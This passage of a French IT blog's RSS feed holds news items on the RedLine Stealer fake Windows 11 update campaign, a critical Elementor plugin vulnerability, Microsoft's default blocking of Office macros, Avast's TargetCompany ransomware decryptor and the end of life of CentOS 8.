</p><ul><li><strong><em>Sans domaine personnalisé</em></strong> : <a href="https://github.com/in-sys/in-sys.github.io?ref=insys.fr">in-sys.github.io</a> (dans le cas présent, vous redirigera vers le domaine personnalisé)</li><li><strong><em>Avec domaine personnalisé </em></strong>: <a href="https://github.insys.fr/?ref=insys.fr">github.insys.fr</a></li></ul> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Le malware RedLine Stealer : une fausse mise à jour de Windows 11 qui s&#x27;attaque à vos données ]]></title>
                    <description><![CDATA[ Malware RedLine Stealer : une fausse mise à jour de Windows 11 qui s&#39;attaque à vos mots de passe, cookies de navigateur, cartes de crédit, identifiants VPN, identifiants FTP, portefeuilles de crypto-monnaies et bien plus... ]]></description>
                    <link>https://insys.fr/blog/le-malware-redline-stealer-une-fausse-mise-a-jour-de-windows-11-qui-sattaque-a-vos-donnees/</link>
                    <guid isPermaLink="false">62063f106c702b006114cc4f</guid>
                    <category><![CDATA[ Virus ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Fri, 11 Feb 2022 12:40:00 +0100</pubDate>
                    <media:content url="https://images.unsplash.com/photo-1642783327549-db8f4487dd68?crop&#x3D;entropy&amp;cs&#x3D;tinysrgb&amp;fit&#x3D;max&amp;fm&#x3D;jpg&amp;ixid&#x3D;MnwxMTc3M3wwfDF8c2VhcmNofDR8fG1hbHdhcmV8ZW58MHx8fHwxNjQ0NTc3NzI4&amp;ixlib&#x3D;rb-1.2.1&amp;q&#x3D;80&amp;w&#x3D;2000" medium="image"/>
                    <content:encoded><![CDATA[ <p>Les auteurs des menaces ont commencé à distribuer de faux installateurs de mise à niveau de Windows 11 <strong>aux utilisateurs de Windows 10</strong>, les incitant à télécharger et à exécuter le malware (virus) <strong>RedLine Stealer </strong>des pirates informatiques.</p><p>Le timing des attaques coïncide avec le moment où <strong>Microsoft a annoncé la large phase de déploiement de Windows 11</strong>. Les attaquants étaient donc bien préparés à ce mouvement et ont attendu le bon moment pour maximiser le succès de leur opération.</p><p><strong>RedLine Stealer</strong> est actuellement un malware <strong>s'attaquant</strong> <strong>aux mots de passe</strong>, <strong>cookies de navigateur</strong>, <strong>cartes de crédit, identifiants VPN</strong>, <strong>identifiants FTP</strong>,<strong> portefeuilles de crypto-monnaies</strong> et bien plus... <br>Il est le plus largement déployé, de sorte que ses infections peuvent avoir des conséquences désastreuses pour les victimes.<br></p><h2 id="la-campagne-dattaques"><br>La campagne d'attaques</h2><p>Selon les chercheurs de HP, qui ont repéré cette campagne, les acteurs ont utilisé le domaine apparemment légitime "<strong>windows-upgraded.com</strong>" pour la partie distribution du malware de leur campagne.</p><!--kg-card-begin: markdown--><p>Le site <strong>apparaît comme un site Microsoft authentique</strong> et, si le visiteur clique sur le bouton &quot;<strong>Download Now</strong>&quot;, il reçoit une archive <code>.ZIP</code> de 1,5 Mo nommée &quot;<code>Windows11InstallationAssistant.zip</code>&quot;, récupérée directement depuis un <strong>CDN Discord</strong>.</p>
<!--kg-card-end: markdown--><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/site.png" class="kg-image" alt loading="lazy" width="1136" height="727" srcset="https://insys.fr/content/images/size/w600/2022/02/site.png 600w, https://insys.fr/content/images/size/w1000/2022/02/site.png 1000w, https://insys.fr/content/images/2022/02/site.png 1136w"><figcaption>Faux site web utilisé pour la distribution de logiciels malveillants (HP)</figcaption></figure><p><br>La décompression du fichier donne lieu à un dossier de <strong>753 Mo</strong>, présentant un <strong>taux de compression impressionnant de 99,8 %</strong>, obtenu grâce à la présence d'un remplissage dans l'exécutable.</p><p>Lorsque la victime lance l'exécutable dans le dossier, <strong>un processus PowerShell </strong>avec un argument codé <strong>démarre</strong>.</p><!--kg-card-begin: markdown--><p>Ensuite, un processus <code>cmd.exe</code> est lancé avec un délai d'attente de 21 secondes, et après expiration de ce délai, un fichier <code>.jpg</code> est récupéré sur un serveur Web distant.</p>
<!--kg-card-end: markdown--><p>Ce fichier contient <strong>une DLL</strong> dont le contenu est disposé de manière inversée, probablement pour échapper à la détection et à l'analyse.</p><p>Enfin, le processus initial charge la DLL et remplace le contexte du thread actuel par celle-ci. Cette DLL est une charge utile RedLine Stealer qui se connecte au serveur de commande et de contrôle via TCP pour obtenir des instructions sur les tâches malveillantes qu'il doit exécuter ensuite sur le système nouvellement compromis.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/redline_06.png" class="kg-image" alt loading="lazy" width="1028" height="511" srcset="https://insys.fr/content/images/size/w600/2022/02/redline_06.png 600w, https://insys.fr/content/images/size/w1000/2022/02/redline_06.png 1000w, https://insys.fr/content/images/2022/02/redline_06.png 1028w"><figcaption>Chaîne d'exécution et de chargement RedLine (HP)</figcaption></figure><h2 id="outlook"><br>Outlook</h2><p>Bien que le site de distribution soit maintenant hors service, rien n'empêche les acteurs de créer un nouveau domaine et de relancer leur campagne. En fait, il est très probable que cela se produise déjà dans la nature.</p><p><strong>Windows 11 est une mise à niveau majeure</strong> que <strong>de nombreux utilisateurs de Windows 10 ne peuvent obtenir auprès des canaux de distribution officiels</strong> en raison d'incompatibilités matérielles, ce que les opérateurs de logiciels malveillants considèrent comme une excellente occasion de trouver de nouvelles victimes.</p><p>Comme <strong>BleepingComputer</strong> l'a signalé en janvier, les acteurs de la menace tirent également parti des clients de mise à jour légitimes de Windows pour exécuter un code malveillant sur les systèmes Windows compromis, de sorte que les tactiques signalées par HP ne sont guère surprenantes à ce stade.</p><p><em>N'oubliez pas que ces sites dangereux sont promus via des forums, des messages de médias sociaux ou des messages instantanés, alors ne vous fiez qu'aux alertes officielles du système de mise à jour de Windows et au domaine "<a href="https://microsoft.com/?ref=insys.fr">Microsoft.com</a>".</em></p><p><br><a href="https://www.bleepingcomputer.com/news/security/fake-windows-11-upgrade-installers-infect-you-with-redline-malware/?ref=insys.fr">Source</a></p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ WordPress : une vulnérabilité critique trouvée dans un plugin pour Elementor avec plus d&#x27;un million d&#x27;installations ]]></title>
                    <description><![CDATA[ Un plugin WordPress avec plus d&#39;un million d&#39;installations s&#39;est avéré contenir une vulnérabilité critique qui pourrait entraîner l&#39;exécution de code arbitraire sur des sites Web compromis. ]]></description>
                    <link>https://insys.fr/blog/wordpress-une-vulnerabilite-critique-trouvee-dans-un-plugin-pour-elementor-avec-plus-dun-million-dinstallations/</link>
                    <guid isPermaLink="false">620534f26c702b006114cbcc</guid>
                    <category><![CDATA[ Wordpress ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Thu, 10 Feb 2022 17:14:00 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2022/02/Essential-Addons-Featured-images-1-1.png" medium="image"/>
                    <content:encoded><![CDATA[ <p>Un plugin WordPress avec plus d'un million d'installations s'est avéré contenir une vulnérabilité critique qui pourrait entraîner l'exécution de code arbitraire sur des sites Web compromis. <br><strong>La vulnérabilité à été rendue publique sous <a href="https://vulmon.com/vulnerabilitydetails?qid=CVE-2022-0320&scoretype=cvssv2&ref=insys.fr">CVE-2022-0320</a>, elle atteint un score de 9.8 sous CVSS v3.</strong></p><p>Le plugin en question est <strong><a href="https://wordpress.org/plugins/essential-addons-for-elementor-lite/?ref=insys.fr">Essential Addons for Elementor</a></strong>, qui fournit aux propriétaires de sites WordPress une bibliothèque de plus de 80 éléments et extensions pour aider à concevoir et personnaliser des pages et des publications.</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">?</div><div class="kg-callout-text"><em><strong><a href="https://patchstack.com/?ref=insys.fr">Patchstack</a>, </strong></em><br><em>(qui est un outil qui aide à identifier les vulnérabilités de sécurité dans tous les plugins, thèmes et noyaux de sites Web)</em> <em><strong>a déclaré </strong>:</em><br><br><em>"Cette vulnérabilité permet à tout utilisateur, quel que soit son statut d'authentification ou d'autorisation, d'effectuer une attaque par inclusion de fichiers locaux"</em><br><br><em>"Cette attaque peut être utilisée pour inclure des fichiers locaux sur le système de fichiers du site Web, tels que /etc/passwd. Cela peut également être utilisé pour effectuer RCE en incluant un fichier avec un code PHP malveillant qui ne peut normalement pas être exécuté."</em></div></div><p><br>Cela dit, la vulnérabilité n'existe que si des widgets tels que la galerie dynamique et la galerie de produits sont utilisés, qui utilisent la fonction vulnérable, entraînant l'inclusion de fichiers locaux - une technique d'attaque dans laquelle une application Web est amenée à exposer ou à exécuter des fichiers arbitraires sur le serveur Web.</p><p><strong>La faille affecte toutes les versions de l'addon</strong> <strong>à partir de la version 5.0.4 et inférieure</strong>, et le chercheur "Wai Yan Myo Thet" est crédité d'avoir découvert la vulnérabilité. <br>Suite à une divulgation responsable, la faille de sécurité a <strong>finalement été colmatée dans la version 5.0.5 publiée</strong> le 28 janvier "après plusieurs correctifs insuffisants".</p><p>Le développement intervient des semaines après qu'il est apparu que des acteurs non identifiés avaient altéré des dizaines de thèmes et plugins WordPress hébergés sur le site Web d'un développeur pour injecter une porte dérobée dans le but d'infecter d'autres sites.</p><p>Il est donc recommandé d'effectuer une mise à jour d'<strong><a href="https://wordpress.org/plugins/essential-addons-for-elementor-lite/?ref=insys.fr">Essential Addons for Elementor</a> </strong>vers la dernière version (actuellement 5.0.7) au plus vite !</p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Microsoft va bloquer les macros par défaut dans cinq applications Office ]]></title>
                    <description><![CDATA[ La firme Microsoft a annoncé récemment qu&#39;elle bloquera par défaut l&#39;exécution de scripts macro dans les applications Access, d&#39;Excel, de PowerPoint, de Visio et Word. ]]></description>
                    <link>https://insys.fr/blog/microsoft-va-bloquer-les-macros-internet-par-defaut-dans-cinq-applications-office/</link>
                    <guid isPermaLink="false">62030c5b6c702b006114ca8b</guid>
                    <category><![CDATA[ Microsoft ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Wed, 09 Feb 2022 09:00:00 +0100</pubDate>
                    <media:content url="https://images.unsplash.com/photo-1580428839063-353cbae694a1?crop&#x3D;entropy&amp;cs&#x3D;tinysrgb&amp;fit&#x3D;max&amp;fm&#x3D;jpg&amp;ixid&#x3D;MnwxMTc3M3wwfDF8c2VhcmNofDQ4fHxtaWNyb3NvZnR8ZW58MHx8fHwxNjQ0MzY2OTYz&amp;ixlib&#x3D;rb-1.2.1&amp;q&#x3D;80&amp;w&#x3D;2000" medium="image"/>
                    <content:encoded><![CDATA[ <p>Dans l'un des changements les plus importants de ces dernières années, Microsoft <a href="https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805?ref=insys.fr">a annoncé</a> aujourd'hui qu'elle bloquera par défaut l'exécution de scripts macro VBA (<em>Visual Basic for Applications</em>)<strong> </strong>dans cinq applications Office.</p><p>À partir du début du mois d'avril 2022, les utilisateurs d'<strong>Access</strong>, d'<strong>Excel</strong>, de <strong>PowerPoint</strong>, de <strong>Visio</strong> et de <strong>Word</strong> ne seront plus en mesure d'activer des macroscripts dans des documents non fiables qu'ils ont téléchargés sur Internet.</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">?</div><div class="kg-callout-text"><em><a href="https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805?ref=insys.fr"><strong>Kellie Eickmeyer</strong></a>, PM (program manager) principal chez <strong>Microsoft</strong> explique :</em><br><br>"<em>La valeur par défaut est plus sûre et devrait permettre à un plus grand nombre d'utilisateurs d'être en sécurité, y compris les utilisateurs à domicile et les employés d'entreprises</em>".</div></div><p></p><h2 id="une-modification-tr%C3%A8s-demand%C3%A9e"><br>Une modification très demandée</h2><p><strong>Cette modification</strong>, réclamée depuis des années par les chercheurs en sécurité, <strong>devrait constituer un sérieux obstacle pour les cybercriminels</strong> qui produisent des logiciels malveillants, qui s'appuient sur la manipulation des utilisateurs pour permettre l'exécution d'un script macro afin d'installer des logiciels malveillants sur leurs systèmes.</p><h2 id="comment-proc%C3%A8dent-les-cybercriminels"><br>Comment procèdent les cybercriminels ?</h2><p>Dans ces attaques, <strong>les utilisateurs reçoivent généralement un document par courrier électronique</strong> qu'ils sont invités à télécharger à partir d'un site Internet. Lorsqu'ils ouvrent le fichier, <strong>l'attaquant laisse généralement un message demandant à l'utilisateur de permettre l'exécution du script macro</strong>.</p><p>Si les utilisateurs ayant des connaissances techniques et en cybersécurité sont en mesure de reconnaître qu'il s'agit d'un leurre pour se faire infecter par des logiciels malveillants, <strong>de nombreux utilisateurs quotidiens d'Office ignorent encore cette technique</strong> et finissent par suivre les instructions fournies, <strong>s'infectant ainsi eux-mêmes</strong> avec des logiciels malveillants.</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/dridex-email-malicieux-macro-office.jpg" width="975" height="694" loading="lazy" alt srcset="https://insys.fr/content/images/size/w600/2022/02/dridex-email-malicieux-macro-office.jpg 600w, https://insys.fr/content/images/2022/02/dridex-email-malicieux-macro-office.jpg 975w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://insys.fr/content/images/2022/02/microsoft-excel-files-increasingly-used-to-spread-malware.png" width="736" height="492" loading="lazy" alt srcset="https://insys.fr/content/images/size/w600/2022/02/microsoft-excel-files-increasingly-used-to-spread-malware.png 600w, https://insys.fr/content/images/2022/02/microsoft-excel-files-increasingly-used-to-spread-malware.png 736w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Exemples d'un document Word et Excel contenant du code malveillant&nbsp;</figcaption></figure><h2 id="un-probl%C3%A8me-connu-depuis-des-ann%C3%A9es"><br>Un problème connu depuis des années...</h2><p>La gestion de ce problème a été <strong>une épine dans le pied de Microsoft car les scripts macro VBA sont souvent utilisés dans les entreprises</strong> pour automatiser certaines opérations et tâches lors de l'ouverture de certains fichiers, comme l'importation de données et la mise à jour du contenu du document à partir de sources dynamiques.</p><p><strong>Depuis le début des années 2000</strong>, Microsoft a tenté de résoudre ce problème en affichant un léger avertissement de sécurité sous la forme d'une barre d'outils en haut du document, mais cet avertissement contenait également des contrôles permettant aux utilisateurs d'exécuter les macro-scripts.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/VBAMacros-previous.png" class="kg-image" alt loading="lazy" width="622" height="27" srcset="https://insys.fr/content/images/size/w600/2022/02/VBAMacros-previous.png 600w, https://insys.fr/content/images/2022/02/VBAMacros-previous.png 622w"><figcaption>Message d'avertissement permettant d'activer le macro</figcaption></figure><p>Après le déploiement de cette modification auprès des utilisateurs finaux, cet avertissement sera remplacé par une barre d'alerte rouge informant l'utilisateur que le document contient des macros mais que celles-ci ne peuvent être activées pour des raisons de sécurité.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/VBAMacrosBlockedTrustBar.png" class="kg-image" alt loading="lazy" width="774" height="30" srcset="https://insys.fr/content/images/size/w600/2022/02/VBAMacrosBlockedTrustBar.png 600w, https://insys.fr/content/images/2022/02/VBAMacrosBlockedTrustBar.png 774w"><figcaption>Message d'avertissement sans possibilité d'activer le macro</figcaption></figure><p></p><h2 id="comment-va-agir-microsoft"><br>Comment va agir Microsoft ?</h2><p>Microsoft a annoncé ses plans récemment <a href="https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805?ref=insys.fr">dans un billet de blog sur son portail Tech Community</a>. Le billet de blog contient également une description de la logique que les cinq applications Office suivront pour décider d'autoriser ou de bloquer l'exécution de scripts macro dans un document.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/VBA-macros.png" class="kg-image" alt loading="lazy" width="999" height="315" srcset="https://insys.fr/content/images/size/w600/2022/02/VBA-macros.png 600w, https://insys.fr/content/images/2022/02/VBA-macros.png 999w"><figcaption>Flux d'évaluation pour les fichiers Office avec macros VBA et MOTW</figcaption></figure><p>Microsoft a déclaré que la décision de bloquer les macros VBA par défaut ne concerne que <strong>Access</strong>, <strong>Excel</strong>, <strong>PowerPoint</strong>, <strong>Visio </strong>et <strong>Word </strong>sur Windows. <strong>Les documents contenant des macros VBA qui ont été créées et obtenues à l'intérieur du réseau de confiance d'une organisation seront toujours autorisés à s'exécuter.</strong></p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">?</div><div class="kg-callout-text"><strong>Microsoft </strong>a déclaré :<br><br><em>"Le changement commencera à être déployé dans la version 2203, en commençant par le canal actuel (aperçu) au début du mois d'avril 2022"</em><br><br><em>"Plus tard, le changement sera disponible dans les autres canaux de mise à jour, tels que Current Channel, Monthly Enterprise Channel et Semi-Annual Enterprise Channel."</em></div></div><p></p><p>Le changement sera <strong>déployé pour tous les clients de</strong> <strong>Microsoft 365</strong> et le fabricant du système d'exploitation a déclaré qu'il prévoit également de rétrocéder le changement à d'autres versions d'Office, telles que <strong>Office LTSC</strong>, <strong>Office 2021</strong>, <strong>Office 2019</strong>, <strong>Office 2016</strong> et <strong>Office 2013</strong>.</p><p>Une fois terminée, cette mesure aura un impact sur la distribution d'un grand nombre de souches de logiciels malveillants de base, mais aussi sur de nombreuses campagnes d'espionnage à motivation financière et politique ; toutefois, ces opérations se poursuivront très probablement en utilisant d'autres techniques.</p><p>Auparavant, Microsoft avait également bloqué l'exécution de macro-scripts Excel 4.0 (XLM) après des abus similaires de la part des cybercriminels.</p> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ Victime du ransomware TargetCompany ? Un décrypteur gratuit publié par Avast ]]></title>
                    <description><![CDATA[ Avast a publié un utilitaire de décryptage pour aider les victimes du ransomware TargetCompany à récupérer leurs fichiers gratuitement. ]]></description>
                    <link>https://insys.fr/blog/victime-du-ransomware-targetcompany-un-decrypteur-gratuit-publie-par-avast/</link>
                    <guid isPermaLink="false">62018bcf6c702b006114c9c7</guid>
                    <category><![CDATA[ Sécurité ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Tue, 08 Feb 2022 08:30:00 +0100</pubDate>
                    <media:content url="https://images.unsplash.com/photo-1634804306598-f2efe3ead034?crop&#x3D;entropy&amp;cs&#x3D;tinysrgb&amp;fit&#x3D;max&amp;fm&#x3D;jpg&amp;ixid&#x3D;MnwxMTc3M3wwfDF8c2VhcmNofDE0fHxwYXNzd29yZHxlbnwwfHx8fDE2NDQyNzI0MzI&amp;ixlib&#x3D;rb-1.2.1&amp;q&#x3D;80&amp;w&#x3D;2000" medium="image"/>
                    <content:encoded><![CDATA[ <p>La société tchèque de logiciels de cybersécurité <a href="https://www.avast.com/?ref=insys.fr">Avast</a> a publié <a href="#telecharger-loutil">un utilitaire de décryptage</a> pour aider les victimes du rançongiciel - ransomware TargetCompany à récupérer leurs fichiers gratuitement.</p><p>Cependant, comme le prévient <a href="https://www.avast.com/?ref=insys.fr">Avast</a>, ce décrypteur ne peut être utilisé que pour restaurer des fichiers cryptés "dans certaines circonstances".</p><h2 id="sous-quelles-conditions"><br>Sous quelles conditions ?</h2><p>Les victimes qui souhaitent récupérer leurs fichiers à l'aide de cet outil de décryptage doivent également être conscientes qu'il s'agira probablement d'un processus gourmand en ressources et en temps.</p><p><em>"Pendant le craquage du mot de passe, tous vos cœurs de processeur disponibles dépenseront la majeure partie de leur puissance de calcul pour trouver le mot de passe de déchiffrement. Le processus de craquage peut prendre beaucoup de temps, jusqu'à des dizaines d'heures", <a href="https://decoded.avast.io/threatresearch/decrypted-targetcompany-ransomware/?ref=insys.fr">a déclaré Avast</a>.</em></p><p><em>"Le décrypteur enregistre périodiquement la progression et si vous l'interrompez et redémarrez le décrypteur plus tard, il vous offre une option pour reprendre le processus de craquage précédemment commencé."</em></p><h2 id="comment-le-d%C3%A9cryptage-fonctionne"><br>Comment le décryptage fonctionne ?</h2><p>Le décrypteur rançongiciel - ransomware de  TargetCompany fonctionne en déchiffrant le mot de passe après avoir comparé un fichier crypté avec sa version originale non cryptée.</p><p>Avast dit que cela ne doit être fait qu'une seule fois pour chaque appareil chiffré par le rançongiciel - ransomware TargetCompany puisque l'assistant de décryptage vous permettra d'entrer des mots de passe de cryptage précédemment piratés en sélectionnant "Je connais le mot de passe pour décrypter les fichiers".</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/TargetCompany-decryptor.png" class="kg-image" alt loading="lazy" width="1254" height="472" srcset="https://insys.fr/content/images/size/w600/2022/02/TargetCompany-decryptor.png 600w, https://insys.fr/content/images/size/w1000/2022/02/TargetCompany-decryptor.png 1000w, https://insys.fr/content/images/2022/02/TargetCompany-decryptor.png 1254w" sizes="(min-width: 720px) 720px"><figcaption><em>TargetCompany decryptor</em></figcaption></figure><h2 id="t%C3%A9l%C3%A9charger-loutil"><br>Télécharger l'outil</h2><p><strong>Les victimes du rançongiciel - ransomware TargetCompany peuvent télécharger l'outil de décryptage à partir des serveurs d'Avast.</strong><br>Choisissez une version qui correspond à votre installation Windows. La version 64 bits est nettement plus rapide et la plupart des installations Windows actuelles sont en 64 bits.<strong>:</strong></p><ul><li>Si vous avez Windows 64 bits, choisissez la <a href="https://files.avast.com/files/decryptor/avast_decryptor_targetcompany64.exe?ref=insys.fr">version 64 bits</a>.</li><li>Si vous avez Windows 32 bits, choisissez la <a href="https://files.avast.com/files/decryptor/avast_decryptor_targetcompany.exe?ref=insys.fr">version 32 bits</a>.</li></ul><p><strong>Pour décrypter des partitions de disque entières en suivant les instructions affichées dans l'interface utilisateur de l'outil.</strong></p><p><em>"Sur la dernière page de l'assistant, vous pouvez indiquer si vous souhaitez sauvegarder les fichiers cryptés. Ces sauvegardes peuvent être utiles en cas de problème pendant le processus de décryptage", a ajouté Avast.</em></p><figure class="kg-card kg-image-card"><img src="https://insys.fr/content/images/2022/02/tc09.png" class="kg-image" alt loading="lazy" width="710" height="531" srcset="https://insys.fr/content/images/size/w600/2022/02/tc09.png 600w, https://insys.fr/content/images/2022/02/tc09.png 710w"></figure><p><em>"Cette option est activée par défaut, ce que nous recommandons. Après avoir cliqué sur "Décrypter", le processus de décryptage commence. Laissez le décrypteur fonctionner et attendez qu'il se termine."</em></p><p>Vous pouvez trouver des instructions supplémentaires sur la façon d'utiliser le décrypteur de ransomware TargetCompany d'Avast <a href="https://decoded.avast.io/threatresearch/decrypted-targetcompany-ransomware/?ref=insys.fr">ici</a>.</p><h2 id="quelques-informations-sur-targetcompany"><br>Quelques informations sur TargetCompany</h2><p>TargetCompany est un ransomware découvert relativement récemment, actif depuis la mi-juin 2021.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/TargetCompany-activity.png" class="kg-image" alt loading="lazy" width="1600" height="507" srcset="https://insys.fr/content/images/size/w600/2022/02/TargetCompany-activity.png 600w, https://insys.fr/content/images/size/w1000/2022/02/TargetCompany-activity.png 1000w, https://insys.fr/content/images/2022/02/TargetCompany-activity.png 1600w" sizes="(min-width: 720px) 720px"><figcaption><em>TargetCompany ransomware soumissions (ID-Ransomware)</em></figcaption></figure><p>Il ajoutera une extension <strong>.mallox</strong>, <strong>.exploit</strong>, <strong>.architek</strong> ou <strong>.brg</strong> à tous les fichiers chiffrés et dépose également un fichier de note de rançon nommé "<strong>HOW TO RECOVER !!.TXT</strong>" dans tous les dossiers contenant des fichiers cryptés.</p><p>Cela se produit après avoir supprimé les clichés instantanés de volume, reconfiguré les options de démarrage et tué les processus qui pourraient verrouiller les bases de données d'informations sensibles (par exemple, MySQL, Oracle, SQL Server).</p><p><br></p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">ℹ️</div><div class="kg-callout-text"><a href="https://avast.com/?ref=insys.fr">Avast</a> a également publié des décrypteurs gratuits pour les rançongiciels <a href="https://www.avast.com/ransomware-decryption-tools?ref=insys.fr#babuk">Babuk</a>, <a href="https://www.avast.com/ransomware-decryption-tools?ref=insys.fr#atomsilo">AtomSilo</a> et <a href="https://www.avast.com/ransomware-decryption-tools?ref=insys.fr#atomsilo">LockFile</a> en octobre 2021 pour permettre aux victimes de récupérer leurs fichiers sans payer de rançon.</div></div> ]]></content:encoded>
                </item>
                <item>
                    <title><![CDATA[ CentOS 8 : Comment résoudre l&#x27;erreur &quot;Failed to download metadata for repo &#x27;appstream&#x27;&quot; ]]></title>
                    <description><![CDATA[ Comment résoudre l&#39;erreur &quot;Failed to download metadata for repo &#39;appstream&#39;: Cannot prepare internal mirrorlist: No URLs in mirrorlist&quot; en migrant de CentOS 8 à CentOS Stream. ]]></description>
                    <link>https://insys.fr/blog/centos-8-comment-resoudre-lerreur-failed-to-download-metadata-for-repo-appstream/</link>
                    <guid isPermaLink="false">61fbc839a0e2b7006117b093</guid>
                    <category><![CDATA[ Linux ]]></category>
                    <dc:creator><![CDATA[ INSYS ]]></dc:creator>
                    <pubDate>Thu, 03 Feb 2022 17:42:56 +0100</pubDate>
                    <media:content url="https://insys.fr/content/images/2022/02/CentOS_8.png" medium="image"/>
                    <content:encoded><![CDATA[ <p>Error: Failed to download metadata for repo 'appstream': Cannot prepare internal mirrorlist: No URLs in mirrorlist<br><strong>Vous avez rencontré cette erreur en essayant de mettre à jour votre Centos 8 Linux depuis le 31 janvier 2022 ?</strong><em> Vous trouverez ici tout ce que vous devez savoir sur CentOS 8 Linux et <strong><a href="#migrer-de-centos-linux-8-vers-centos">comment migrer</a></strong>.</em><br></p><h2 id="lhistoire-derri%C3%A8re-centos"><br>L'histoire derrière CentOS</h2><p><strong><a href="https://www.centos.org/centos-linux/?ref=insys.fr">CentOS Linux</a></strong> est <strong>une reconstruction de <a href="https://fr.wikipedia.org/wiki/Red_Hat_Enterprise_Linux?ref=insys.fr">Red Hat Enterprise Linux</a> (RHEL)</strong>. Comme il s'agit d'un <strong>projet communautaire en aval de RHEL</strong>, toute modification apportée à une distribution <strong>RHEL</strong> est également appliquée à son homologue <strong>CentOS</strong> quelques mois plus tard.</p><p>La différence la plus notable entre les deux est le coût. Alors que <strong>CentOS</strong> est une distribution Linux à <strong>code source ouvert </strong>(<a href="https://fr.wikipedia.org/wiki/Open_source?ref=insys.fr">open source</a>), <strong>RHEL</strong> est une <strong>distribution Linux commerciale</strong> développée <strong>par <a href="https://www.redhat.com/?ref=insys.fr">Red Hat</a></strong>.</p><p>Quelle est la place de <strong><a href="https://getfedora.org/?ref=insys.fr">Fedora</a> </strong>? <strong>Fedora est un projet communautaire en amont de Red Hat</strong>. Il servait essentiellement d'environnement pour tester les mises à niveau et les modifications avant de les appliquer à <strong>RHEL</strong>.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/rhel-release-cycle-with-centos.png" class="kg-image" alt loading="lazy" width="667" height="220" srcset="https://insys.fr/content/images/size/w600/2022/02/rhel-release-cycle-with-centos.png 600w, https://insys.fr/content/images/2022/02/rhel-release-cycle-with-centos.png 667w"><figcaption>Le cycle de publication précédemment établi consistait en <strong><em>Fedora ➔ RHEL ➔ CentOS</em></strong>.</figcaption></figure><h2 id="centos-vs-centos-stream"><br>CentOS vs CentOS Stream</h2><p><strong><a href="https://www.redhat.com/fr/topics/linux/what-is-centos-stream?ref=insys.fr">CentOS Stream</a></strong> a été introduit en 2019 en tant que version "<a href="https://fr.wikipedia.org/wiki/Rolling_release?ref=insys.fr">rolling release</a>" de <strong>CentOS</strong>. Dans le cycle de publication précédemment mentionné, elle a trouvé sa place entre <strong>Fedora </strong>et <strong>RHEL</strong>, en testant les futures versions mineures.</p><p>Cependant, <strong>RHEL </strong>a apporté des modifications au plan initial, décidant de mettre un terme à toute future version de <strong>CentOS</strong>. <strong>CentOS 8</strong> a été déclarée dernière version en aval et <strong>était prise en charge jusqu'en décembre 2021</strong>. Par conséquent, <strong>au lieu de sa fin de vie annoncée en 2029</strong>, son <strong>cycle de vie</strong> a <strong>été réduit de huit ans</strong>. <br><strong>CentOS Linux 8 </strong>à donc atteint sa <strong><em>fin de vie (EOL) le 31 décembre 2021.</em></strong></p><p><em><strong>RHEL </strong>ne publiera pas de nouvelles distributions <strong>CentOS</strong>, mais uniquement <strong>CentOS Stream</strong>.</em></p><p>Naturellement, la stabilité de <strong><a href="https://www.redhat.com/fr/topics/linux/what-is-centos-stream?ref=insys.fr">CentOS Stream</a></strong> <strong>ne peut pas rivaliser</strong> avec les versions de CentOS. Comme elle fonctionnera au milieu du cycle de publication, elle sera forcément moins stable que la distribution RHEL qu'elle précède.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://insys.fr/content/images/2022/02/rhel-release-cycle-with-centos-stream.png" class="kg-image" alt loading="lazy" width="667" height="220" srcset="https://insys.fr/content/images/size/w600/2022/02/rhel-release-cycle-with-centos-stream.png 600w, https://insys.fr/content/images/2022/02/rhel-release-cycle-with-centos-stream.png 667w"><figcaption>Le cycle de publication consiste maintenant à <strong><em>Fedora ➔ CentOS Stream ➔ RHEL</em></strong>.</figcaption></figure><h2 id="quest-ce-que-cela-signifie-pour-les-autres-versions-de-centos-linux"><br>Qu'est-ce que cela signifie pour les autres versions de CentOS Linux ?</h2><p>Compte tenu de cette décision sans précédent, qui a été largement accueillie par de <strong>vives critiques de la part de la communauté</strong> du logiciel libre (<a href="https://fr.wikipedia.org/wiki/Open_source?ref=insys.fr">open source</a>), vous vous demandez peut-être ce que deviennent les versions précédentes de <strong>CentOS</strong>.</p><ul><li><em>Pour 